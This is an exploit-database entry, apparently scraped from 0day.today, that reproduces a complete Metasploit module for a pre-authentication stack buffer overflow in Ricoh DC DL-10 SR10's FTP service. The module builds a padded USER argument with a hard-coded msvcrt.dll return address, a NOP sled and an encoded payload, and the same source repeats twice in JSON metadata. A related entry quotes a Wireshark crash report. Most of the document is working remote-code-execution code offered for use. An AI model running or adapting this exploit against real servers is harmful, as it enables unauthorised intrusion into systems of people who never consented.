Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow
2012-03-24T00:00:00
ID 1337DAY-ID-17818 Type zdt Reporter metasploit Modified 2012-03-24T00:00:00
Description
Exploit for windows platform in category remote exploits
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  # Metasploit module for a stack-based buffer overflow in the FTP service
  # shipped with Ricoh's DC Software DL-10 (SR10.exe). The overflow is reached
  # through an oversized argument to the FTP USER command, i.e. before any
  # authentication has taken place. Per the description below, the vulnerable
  # path is only reached when the server has been configured with a log file
  # name (disabled by default), so an unconfigured install is not exposed even
  # though its banner matches.
  Rank = NormalRanking

  # Supplies connect/disconnect, banner capture and send_user for the FTP
  # control channel.
  include Msf::Exploit::Remote::Ftp

  # Registers the module metadata (name, references, payload constraints,
  # target) with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info={})
    super(update_info(info,
      'Name' => "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow",
      'Description' => %q{
This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP
service. By supplying a long string of data to the USER command, it is
possible to trigger a stack-based buffer overflow, which allows remote code
execution under the context of the user.
Please note that in order to trigger the vulnerability, the server must
be configured with a log file name (by default, it's disabled).
},
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Julien Ahrens', #Discovery, PoC
          'sinn3r' #Metasploit
        ],
      'References' =>
        [
          ['OSVDB', '79691'],
          ['URL', 'http://secunia.com/advisories/47912'],
          ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']
        ],
      'Payload' =>
        {
          # Only NUL ("\x00") is excluded; no other bad characters.
          'BadChars' => "\x00",
        },
      'DefaultOptions' =>
        {
          # Payload exits by terminating the process rather than its thread.
          'ExitFunction' => "process",
        },
      'Platform' => 'win',
      'Targets' =>
        [
          [
            'Windows XP SP3',
            {
              # Hard-coded to the XP SP3 msvcrt.dll build; the =begin notes
              # after the class record why msvcrt.dll was chosen.
              'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)
              'Offset' => 245
            }
          ]
        ],
      # Code runs as the user that started SR10.exe; no privilege elevation.
      'Privileged' => false,
      'DisclosureDate' => "Mar 1 2012",
      'DefaultTarget' => 0))
    # We're triggering the bug via the USER command, no point to have user/pass
    # as configurable options.
    deregister_options('FTPPASS', 'FTPUSER')
  end

  # Fingerprints the service from its FTP greeting.
  #
  # The Ftp mixin records the greeting in +banner+ during +connect+, so the
  # connection can be closed before the match is evaluated. Only the banner is
  # inspected; the log-file precondition described above is not observable
  # remotely, which is presumably why a match yields Detected rather than
  # Vulnerable.
  #
  # @return [Exploit::CheckCode] Detected on a matching banner, Safe otherwise
  def check
    connect
    disconnect
    if banner =~ /220 DSC ftpd 1\.0 FTP Server/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Builds the oversized USER argument and sends it.
  #
  # Layout of +buf+: target['Offset'] bytes of random alphabetic padding
  # (badchar-filtered), the target return address packed as a 32-bit
  # little-endian value ('V'), a 20-byte NOP sled, then the encoded payload.
  # +handler+ is invoked before +disconnect+; the order matters so that any
  # payload session is picked up before the control channel is closed.
  #
  # Detection note: the USER argument sent here is Offset + 4 + 20 + payload
  # bytes long, far beyond any legitimate username, so logging or alerting on
  # oversized FTP USER arguments flags this traffic on the wire.
  def exploit
    buf = ''
    buf << rand_text_alpha(target['Offset'], payload_badchars)
    buf << [target.ret].pack('V') # intended to land on the saved return address
    buf << make_nops(20)
    buf << payload.encoded
    print_status("#{rhost}:#{rport} - Sending #{self.name}")
    connect
    send_user(buf)
    handler
    disconnect
  end
end
=begin
0:002> lmv m SR10
start end module name
00400000 00410000 SR10 (deferred)
Image path: C:\Program Files\DC Software\SR10.exe
Image name: SR10.exe
Timestamp: Mon May 19 23:55:32 2008 (483275E4)
CheckSum: 00000000
ImageSize: 00010000
File version: 1.0.0.520
Product version: 1.0.0.0
File flags: 0 (Mask 3F)
File OS: 4 Unknown Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0409.04b0
CompanyName: Ricoh Co.,Ltd.
ProductName: SR-10
InternalName: SR-10
OriginalFilename: SR10.EXE
ProductVersion: 1, 0, 0, 0
FileVersion: 1, 0, 0, 520
PrivateBuild: 1, 0, 0, 520
SpecialBuild: 1, 0, 0, 520
FileDescription: SR-10
Note: No other DC Software dlls are loaded when SR-10.exe is running, so the most
stable component we can use is msvcrt.dll for now.
=end
{"hash": "1acf86ed09cbd14d1d54bbb1beb7bfeb180bda0c07cc877cb58a5c7a750ea085", "id": "1337DAY-ID-17818", "lastseen": "2018-01-01T07:16:57", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "b39579db2d6de8b5f64942a4764ae1cb", "key": "href"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "modified"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "c37e55f33a26de32e99af36d1dbb8037", "key": "sourceData"}, {"hash": "d6e11916cf3fc1edf6bfcb811763e890", "key": "sourceHref"}, {"hash": "1cc6ef820a161a28829dfd22169c3074", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2018-01-01T07:16:57"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-26008"]}], "modified": "2018-01-01T07:16:57"}, "vulnersScore": -0.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/17818", "description": "Exploit for windows platform in category remote exploits", "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "history": [{"bulletin": {"hash": "f94d8751113f8e3706a4b34db497df246b972b41583db023e9f437efc7a1951b", "id": "1337DAY-ID-17818", "lastseen": "2016-04-20T01:45:25", "enchantments": {"score": {"value": 4.6, "modified": "2016-04-20T01:45:25"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "modified"}, 
{"hash": "12b1be92f9e67fe9377c9eb58f203922", "key": "description"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "1cc6ef820a161a28829dfd22169c3074", "key": "title"}, {"hash": "d25b8428d9e74f1d97a11bf8496807b7", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "1b3ec8034147f60c74d561db76ae56b3", "key": "sourceHref"}, {"hash": "b5e92171ba1fd0a440ed1681fa277c5f", "key": "sourceData"}, {"hash": "cccd9ed5147b62b70585f5e816828b30", "key": "href"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/17818", "description": "Exploit for windows platform in category remote exploits", "viewCount": 0, "title": "Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. 
By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n 
Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2016-04-20] #", "published": "2012-03-24T00:00:00", "references": [], "reporter": "metasploit", "modified": "2012-03-24T00:00:00", "href": "http://0day.today/exploit/description/17818"}, "lastseen": "2016-04-20T01:45:25", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\nrequire 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::Remote::Ftp\r\n \r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Ricoh DC DL-10 SR10 FTP USER Command Buffer Overflow\",\r\n 'Description' => %q{\r\n This module exploits a vulnerability found in Ricoh DC's DL-10 SR10 FTP\r\n service. 
By supplying a long string of data to the USER command, it is\r\n possible to trigger a stack-based buffer overflow, which allows remote code\r\n execution under the context of the user.\r\n \r\n Please note that in order to trigger the vulnerability, the server must\r\n be configured with a log file name (by default, it's disabled).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Julien Ahrens', #Discovery, PoC\r\n 'sinn3r' #Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['OSVDB', '79691'],\r\n ['URL', 'http://secunia.com/advisories/47912'],\r\n ['URL', 'http://www.inshell.net/2012/03/ricoh-dc-software-dl-10-ftp-server-sr10-exe-remote-buffer-overflow-vulnerability/']\r\n ],\r\n 'Payload' =>\r\n {\r\n # Yup, no badchars\r\n 'BadChars' => \"\\x00\",\r\n },\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => \"process\",\r\n },\r\n 'Platform' => 'win',\r\n 'Targets' =>\r\n [\r\n [\r\n 'Windows XP SP3',\r\n {\r\n 'Ret' => 0x77c35459, #PUSH ESP; RETN (msvcrt.dll)\r\n 'Offset' => 245\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => \"Mar 1 2012\",\r\n 'DefaultTarget' => 0))\r\n \r\n # We're triggering the bug via the USER command, no point to have user/pass\r\n # as configurable options.\r\n deregister_options('FTPPASS', 'FTPUSER')\r\n end\r\n \r\n def check\r\n connect\r\n disconnect\r\n if banner =~ /220 DSC ftpd 1\\.0 FTP Server/\r\n return Exploit::CheckCode::Detected\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n \r\n def exploit\r\n buf = ''\r\n buf << rand_text_alpha(target['Offset'], payload_badchars)\r\n buf << [target.ret].pack('V')\r\n buf << make_nops(20)\r\n buf << payload.encoded\r\n \r\n print_status(\"#{rhost}:#{rport} - Sending #{self.name}\")\r\n connect\r\n send_user(buf)\r\n handler\r\n disconnect\r\n end\r\nend\r\n \r\n=begin\r\n0:002> lmv m SR10\r\nstart end module name\r\n00400000 00410000 SR10 (deferred) \r\n Image path: C:\\Program Files\\DC Software\\SR10.exe\r\n Image name: SR10.exe\r\n 
Timestamp: Mon May 19 23:55:32 2008 (483275E4)\r\n CheckSum: 00000000\r\n ImageSize: 00010000\r\n File version: 1.0.0.520\r\n Product version: 1.0.0.0\r\n File flags: 0 (Mask 3F)\r\n File OS: 4 Unknown Win32\r\n File type: 1.0 App\r\n File date: 00000000.00000000\r\n Translations: 0409.04b0\r\n CompanyName: Ricoh Co.,Ltd.\r\n ProductName: SR-10\r\n InternalName: SR-10\r\n OriginalFilename: SR10.EXE\r\n ProductVersion: 1, 0, 0, 0\r\n FileVersion: 1, 0, 0, 520\r\n PrivateBuild: 1, 0, 0, 520\r\n SpecialBuild: 1, 0, 0, 520\r\n FileDescription: SR-10\r\n \r\n \r\nNote: No other DC Software dlls are loaded when SR-10.exe is running, so the most\r\nstable component we can use is msvcrt.dll for now.\r\n=end\r\n\r\n\n\n# 0day.today [2018-01-01] #", "published": "2012-03-24T00:00:00", "references": [], "reporter": "metasploit", "modified": "2012-03-24T00:00:00", "href": "https://0day.today/exploit/description/17818"}
{"zdt": [{"lastseen": "2018-04-13T07:50:41", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2016-05-13T00:00:00", "published": "2016-05-13T00:00:00", "href": "https://0day.today/exploit/description/26008", "id": "1337DAY-ID-26008", "type": "zdt", "title": "Wireshark - AirPDcapDecryptWPABroadcastKey Heap Based Out-of-Bounds Read", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=740\r\n \r\nThe following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark (\"$ ./tshark -nVxr /path/to/file\"):\r\n \r\n--- cut ---\r\n==8910==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x0000004558a4 bp 0x7fffa0f13710 sp 0x7fffa0f12ec0\r\nREAD of size 16385 at 0x61b00001335c thread T0\r\n #0 0x4558a3 in memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438\r\n #1 0x7f1d70c97b65 in g_memdup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x65b65)\r\n #2 0x7f1d78b4c531 in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:360:32\r\n #3 0x7f1d78b4ba8c in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1522:21\r\n #4 0x7f1d78b424f6 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:602:13\r\n #5 0x7f1d78b40d28 in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:815:21\r\n #6 0x7f1d79a70590 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17818:9\r\n #7 0x7f1d79a44406 in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18426:10\r\n #8 0x7f1d7898a941 in call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #9 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #10 0x7f1d7897c89d in dissector_try_uint_new wireshark/epan/packet.c:1160:9\r\n #11 0x7f1d796c1235 in dissect_frame wireshark/epan/dissectors/packet-frame.c:493:11\r\n #12 0x7f1d7898a941 in 
call_dissector_through_handle wireshark/epan/packet.c:626:8\r\n #13 0x7f1d7897d0ca in call_dissector_work wireshark/epan/packet.c:701:9\r\n #14 0x7f1d78986c0e in call_dissector_only wireshark/epan/packet.c:2674:8\r\n #15 0x7f1d7897839f in call_dissector_with_data wireshark/epan/packet.c:2687:8\r\n #16 0x7f1d789778c1 in dissect_record wireshark/epan/packet.c:509:3\r\n #17 0x7f1d7892ac99 in epan_dissect_run_with_taps wireshark/epan/epan.c:376:2\r\n #18 0x52eebb in process_packet wireshark/tshark.c:3748:5\r\n #19 0x5281ac in load_cap_file wireshark/tshark.c:3504:11\r\n #20 0x51e4bc in main wireshark/tshark.c:2213:13\r\n \r\n0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)\r\nallocated by thread T0 here:\r\n #0 0x4c2098 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40\r\n #1 0x7f1d70c80610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)\r\n #2 0x7f1d8543f638 in wtap_open_offline wireshark/wiretap/file_access.c:1082:2\r\n #3 0x5244dd in cf_open wireshark/tshark.c:4215:9\r\n #4 0x51decd in main wireshark/tshark.c:2204:9\r\n \r\nSUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:438 in memcpy\r\nShadow bytes around the buggy address:\r\n 0x0c367fffa610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n=>0x0c367fffa660: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa\r\n 0x0c367fffa670: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\r\n 0x0c367fffa690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x0c367fffa6b0: 00 00 00 00 00 00 
00 00 00 00 00 00 00 00 00 00\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Heap right redzone: fb\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: f2\r\n Stack right redzone: f3\r\n Stack partial redzone: f4\r\n Stack after return: f5\r\n Stack use after scope: f8\r\n Global redzone: f9\r\n Global init order: f6\r\n Poisoned by user: f7\r\n Container overflow: fc\r\n Array cookie: ac\r\n Intra object redzone: bb\r\n ASan internal: fe\r\n Left alloca redzone: ca\r\n Right alloca redzone: cb\r\n==8910==ABORTING\r\n--- cut ---\r\n \r\nThe crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=12175. Attached are three files which trigger the crash.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39812.zip\n\n# 0day.today [2018-04-13] #", "sourceHref": "https://0day.today/exploit/26008", "cvss": {"score": 0.0, "vector": "NONE"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Buffer overflow on oversied TCP/5151 port request.", "modified": "2007-08-16T00:00:00", "published": "2007-08-16T00:00:00", "id": "SECURITYVULNS:VULN:7541", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7541", "title": "ESRI ArcSDE database server buffer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}